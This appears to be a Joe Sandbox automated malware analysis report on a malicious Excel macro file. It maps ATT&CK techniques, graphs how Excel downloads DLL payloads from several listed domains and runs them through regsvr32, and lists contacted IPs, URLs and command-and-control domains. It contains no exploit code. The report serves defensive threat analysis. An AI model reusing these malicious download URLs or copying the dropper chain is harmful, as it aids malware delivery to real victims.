        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery22Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 444783 Sample: LL52387-01-F4448869.xlsm Startdate: 06/07/2021 Architecture: WINDOWS Score: 100 35 Found malware configuration 2->35 37 Document exploit detected (drops PE files) 2->37 39 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->39 41 6 other signatures 2->41 6 EXCEL.EXE 53 26 2->6         started        process3 dnsIp4 23 uppercilio.fun 104.21.55.83, 49167, 80 CLOUDFLARENETUS United States 6->23 25 voopeople.fun 172.67.194.117, 49166, 80 CLOUDFLARENETUS United States 6->25 27 thousandsyears.download 172.67.198.51, 49165, 80 CLOUDFLARENETUS United States 6->27 19 C:\Users\user\XTOWN.dll, PE32+ 6->19 dropped 21 C:\Users\user\AppData\Local\...\lsdfik[1].fml, PE32+ 6->21 dropped 43 Document exploit detected (creates forbidden files) 6->43 45 Document exploit detected (UrlDownloadToFile) 6->45 11 regsvr32.exe 6->11         started        14 regsvr32.exe 4 6->14         started        17 regsvr32.exe 6->17         started        file5 signatures6 process7 dnsIp8 47 System process connects to network (likely due to code injection or exploit) 11->47 49 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->49 51 Tries to detect virtualization through RDTSC time measurements 11->51 29 astrocycle.download 104.21.37.209, 49169, 80 CLOUDFLARENETUS United States 14->29 31 dr49lng3n1n2s.cloudfront.net 13.224.92.73, 443, 49168 AMAZON-02US United States 14->31 33 2 other IPs or domains 14->33 signatures9

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        LL52387-01-F4448869.xlsm0%ReversingLabs

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        astrocycle.download1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
        http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
        http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
        http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
        http://voopeople.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
        http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
        http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
        http://astrocycle.download/nection0%Avira URL Cloudsafe
        http://astrocycle.download/0%Avira URL Cloudsafe
        http://servername/isapibackend.dll0%Avira URL Cloudsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
        http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
        http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
        http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://uppercilio.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        http://o.ss2.us/00%URL Reputationsafe
        http://o.ss2.us/00%URL Reputationsafe
        http://o.ss2.us/00%URL Reputationsafe
        http://thousandsyears.download/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        http://ocsp.entrust.net030%URL Reputationsafe
        http://ocsp.entrust.net030%URL Reputationsafe
        http://ocsp.entrust.net030%URL Reputationsafe
        http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
        http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
        http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://ocsp.entrust.net0D0%URL Reputationsafe
        http://ocsp.entrust.net0D0%URL Reputationsafe
        http://ocsp.entrust.net0D0%URL Reputationsafe
        http://s.ss2.us/r.crl00%URL Reputationsafe
        http://s.ss2.us/r.crl00%URL Reputationsafe
        http://s.ss2.us/r.crl00%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        uppercilio.fun
        		104.21.55.83
        		truefalse
          		unknown
          thousandsyears.download
          		172.67.198.51
          		truefalse
            		unknown
            voopeople.fun
            		172.67.194.117
            		truefalse
              		unknown
              astrocycle.download
              		104.21.37.209
              		truetrueunknown
              dr49lng3n1n2s.cloudfront.net
              		13.224.92.73
              		truefalse
                		high
                aws.amazon.com
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://voopeople.fun/div/44376,8555986111.jpgfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://astrocycle.download/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://uppercilio.fun/div/44376,8555986111.jpgfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://thousandsyears.download/div/44376,8555986111.jpgfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://twitter.com/awscloudregsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                    		high
                    https://a0.awsstatic.com/libra/1.0.385/directoriesregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                      		high
                      https://aws.amazon.com/terms/?nc1=f_prregsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                        		high
                        https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gifregsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                          		high
                          https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.htmlregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                            		high
                            https://aws.amazon.com/cn/regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                              		high
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://a0.awsstatic.com/libra-css/imagesregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                		high
                                https://a0.awsstatic.com/libra/1.0.385/librastandardlibregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                  		high
                                  https://a0.awsstatic.com/psf/nullregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                    		high
                                    https://aws.amazon.com/ar/regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                      		high
                                      https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-homregsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllwregsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                        		high
                                        https://pages.awscloud.com/communication-preferences?trk=homepageregsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                          		high
                                          http://ocsp.rootg2.amazontrust.com08regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://aws.amazon.com/cn/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                            		high
                                            https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=defaultregsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                              		high
                                              https://aws.amazon.com/ru/regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                		high
                                                https://aws.amazon.com/tw/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowserregsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://i18n-string.us-west-2.prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://aws.amazon.com/ko/regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://aws.amazon.com/ru/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://a0.awsstatic.com/libra-css/images/site/fav/favicon.icoregsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://aws.amazon.com/es/regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://crl.sca1b.amazontrust.com/sca1b.crl0regsvr32.exe, 00000004.00000002.2089187213.00000000003F3000.00000004.00000020.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://astrocycle.download/nectionregsvr32.exe, 00000004.00000002.2093413569.00000000034F2000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://docs.aws.amazon.com/index.html?nc2=h_ql_docregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://aws.amazon.com/ar/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2082060851.0000000001CE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2089261478.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2089961671.0000000001D10000.00000002.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  https://aws.amazon.com/th/regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.2092440893.0000000003110000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      https://a0.awsstatic.com/pricing-calculator/js/1.0.2regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://a0.awsstatic.com/plc/js/1.0.112/plcregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://aws.amazon.com/marketplace/?nc2=h_moregsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://ocsp.sca1b.amazontrust.com06regsvr32.exe, 00000004.00000002.2089187213.00000000003F3000.00000004.00000020.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://amazon.com/regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpfalse
                                                                              		high
                                                                              https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.pngregsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://console.aws.amazon.com/support/home/?nc2=h_ql_curegsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0regsvr32.exe, 00000004.00000002.2089187213.00000000003F3000.00000004.00000020.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://aws.amazon.com/search/regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credentialregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://aws.amazon.com/?nc2=h_lgregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://ocsp.rootca1.amazontrust.com0:regsvr32.exe, 00000004.00000002.2089187213.00000000003F3000.00000004.00000020.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://console.aws.amazon.com/support/home/?nc1=f_drregsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://aws.amazon.com/fr/regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000004.00000002.2092935816.00000000032F7000.00000002.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobileregsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://aws.amazon.com/vi/regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://www.twitch.tv/awsregsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://aws.amazon.com/marketplace/?nc2=h_ql_mpregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://aws.amazon.com/searchregsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://a0.awsstatic.com/libra/1.0.385/libra-head.jsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://crl.rootg2.amazontrust.com/rootg2.crl0regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000004.00000002.2090468143.0000000002D20000.00000002.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://a0.awsstatic.com/da/js/1.0.47/aws-da.jsregsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://aws.amazon.com/tw/regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://aws.amazon.com/tr/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://console.aws.amazon.com/?nc2=h_m_mcregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://aws.amazon.com/fr/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://o.ss2.us/0regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://aws.amazon.com/search/?searchQuery=regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://a0.awsstatic.com/libra-search/1.0.13/jsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://aws.amazon.com/privacy/?nc1=f_prregsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://aws.amazon.com/pt/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://aws.amazon.com/jp/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://aws.amazon.com/regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000004.00000002.2092440893.0000000003110000.00000002.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.pngregsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.jsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://aws.amazon.com/podcasts/aws-podcast/regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://aws.amazon.com/jp/regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://crt.rootg2.amazontrust.com/rootg2.cer0=regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://aws.amazon.com/pt/regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://aws.amazon.com/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.htmlregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://a0.awsstatic.com/libra-css/css/1.0.382regsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://aws.amazon.com/es/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://www.icra.org/vocabulary/.regsvr32.exe, 00000004.00000002.2092935816.00000000032F7000.00000002.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://d1.awsstatic.comregsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://aws.amazon.com/de/regsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://investor.msn.com/regsvr32.exe, 00000004.00000002.2092440893.0000000003110000.00000002.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://phd.aws.amazon.com/?nc2=h_m_scregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://a0.awsstatic.com/libra/1.0.385/libra-cardsuiregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://aws.amazon.com/id/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.pngregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://www.%s.comPAregsvr32.exe, 00000004.00000002.2090468143.0000000002D20000.00000002.00000001.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		low
                                                                                                                                                                    https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=defaultregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://a0.awsstatic.comregsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=ficoregsvr32.exe, 00000004.00000002.2093431236.0000000003512000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://s.ss2.us/r.crl0regsvr32.exe, 00000004.00000002.2089197313.000000000040D000.00000004.00000020.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://aws.amazon.com/th/?nc1=f_lsregsvr32.exe, 00000004.00000003.2085516160.0000000003507000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093418772.00000000034F8000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high

                                                                                                                                                                            Contacted IPs

                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                            Public

                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                            172.67.198.51
                                                                                                                                                                            		thousandsyears.downloadUnited States
                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                            13.224.92.73
                                                                                                                                                                            		dr49lng3n1n2s.cloudfront.netUnited States
                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                            104.21.55.83
                                                                                                                                                                            		uppercilio.funUnited States
                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                            104.21.37.209
                                                                                                                                                                            		astrocycle.downloadUnited States
                                                                                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                                                                                            172.67.194.117
                                                                                                                                                                            		voopeople.funUnited States
                                                                                                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                                                                                                            General Information

                                                                                                                                                                            Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                                            Analysis ID:444783
                                                                                                                                                                            Start date:06.07.2021
                                                                                                                                                                            Start time:17:22:03
